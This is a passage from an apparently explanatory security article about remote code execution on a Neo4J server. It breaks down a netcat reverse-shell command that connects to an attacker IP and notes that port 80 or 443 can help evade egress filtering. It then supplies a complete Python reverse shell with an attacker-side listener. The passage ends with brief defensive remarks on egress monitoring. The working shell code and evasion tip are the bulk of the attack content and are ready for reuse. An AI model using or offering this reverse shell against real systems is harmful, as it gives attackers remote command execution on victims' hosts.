As you saw in the previous description, this AJAX request triggers the server-side execution of: ../../nc.exe -e cmd.exe 192.168.213.1 1234 (the ../../ prefix is a path relative to the server process's working directory, so nc.exe has to already be present on the server for the command to work).

If you are not that familiar with NetCat (nc), here is what that command does:

nc.exe : starts NetCat

-e cmd.exe : starts cmd.exe and wires its standard streams to the network connection, that is:

whatever cmd.exe writes to its output stream (stdout and stderr) becomes NetCat's input stream, which NetCat sends to the attacker, and

whatever NetCat receives from the attacker is written to cmd.exe's input stream (stdin), so the attacker types commands and reads their output as if sitting at that console

192.168.213.1 : IP address of the attacker's server, to which NetCat connects out from the Neo4J host (a reverse shell: the attacker only needs a listener such as nc -l -p 1234 on that address, and the shell runs with the privileges of the Neo4J server process)

1234 : port on the attacker's host that NetCat connects to (it could be set to 80 or 443 so that the outbound connection looks like ordinary web traffic and is less likely to be blocked by egress filtering or noticed)
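As an added illustration, not code from the page, here is a minimal Python equivalent of both sides of that command. reverse_shell() does what nc -e does on the victim (connect out, then cross-wire the shell's stdin/stdout with the socket), and attacker_listener() plays the role of the attacker's nc -l -p 1234. Both function names are mine; the block assumes cmd.exe on Windows and /bin/sh elsewhere, and demo() runs the two ends against each other on 127.0.0.1 with an OS-chosen port and a constructed command sequence (echo hello, then exit).

```python
import os
import socket
import subprocess
import threading

# Shell handed to the attacker: cmd.exe on Windows (as on the page), /bin/sh elsewhere (assumption).
SHELL = "cmd.exe" if os.name == "nt" else "/bin/sh"


def _pump(read, write):
    """Copy chunks from read() to write() until EOF or until the far end goes away."""
    try:
        while True:
            data = read()
            if not data:
                break
            write(data)
    except OSError:
        pass  # socket shut down or shell exited: stop pumping, like nc does


def reverse_shell(host, port):
    """What `nc -e <shell> host port` does: connect OUT from the victim to the attacker's
    listener, then wire the shell's streams to the socket. Returns the shell's exit code."""
    sock = socket.create_connection((host, port))
    proc = subprocess.Popen([SHELL], stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE, stderr=subprocess.STDOUT)

    def to_shell(data):  # bytes received from the attacker -> shell's stdin
        proc.stdin.write(data)
        proc.stdin.flush()

    # attacker -> shell stdin
    t_in = threading.Thread(target=_pump, args=(lambda: sock.recv(4096), to_shell), daemon=True)
    # shell stdout/stderr -> attacker
    t_out = threading.Thread(target=_pump,
                             args=(lambda: os.read(proc.stdout.fileno(), 4096), sock.sendall),
                             daemon=True)
    t_in.start()
    t_out.start()
    t_out.join()            # EOF on the shell's stdout means the shell has exited
    rc = proc.wait()
    try:
        sock.shutdown(socket.SHUT_RDWR)  # wakes the recv() in t_in, signals EOF to the attacker
    except OSError:
        pass                # attacker already hung up
    sock.close()
    t_in.join()
    return rc


def attacker_listener(srv, commands, captured):
    """The attacker's side (what `nc -l -p 1234` does): accept the inbound connection,
    feed it commands, and collect everything the shell sends back until it closes."""
    conn, _ = srv.accept()
    with conn:
        for cmd in commands:
            conn.sendall(cmd)
        while True:
            data = conn.recv(4096)
            if not data:
                break
            captured.append(data)


def demo(commands=(b"echo hello\n", b"exit\n")):
    """Run both ends against each other on localhost (constructed command sequence).
    Returns (shell exit code, bytes the attacker received)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))   # port 0: let the OS pick a free port; the page uses 1234
    srv.listen(1)
    port = srv.getsockname()[1]
    captured = []
    t = threading.Thread(target=attacker_listener, args=(srv, commands, captured))
    t.start()
    rc = reverse_shell("127.0.0.1", port)
    t.join()
    srv.close()
    return rc, b"".join(captured)


if __name__ == "__main__":
    code, output = demo()
    print(code, output.decode(errors="replace"))
```

The direction of the connection is the point to notice from a defender's view: the Neo4J host opens the TCP session towards the attacker, so an inbound firewall rule on the server does nothing against it, while an outbound connection from the Neo4J (Java) process to an unusual host is exactly what egress filtering and process-to-network logging should flag.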

When a feature is a vulnerability

This case is interesting because the ability to run Java code on the server is a major feature that ships enabled by default with Neo4J. That feature is part of what makes Neo4J popular, so there is little chance it will be removed; the exposure comes from who is allowed to reach it, not from a bug that a patch can simply take away.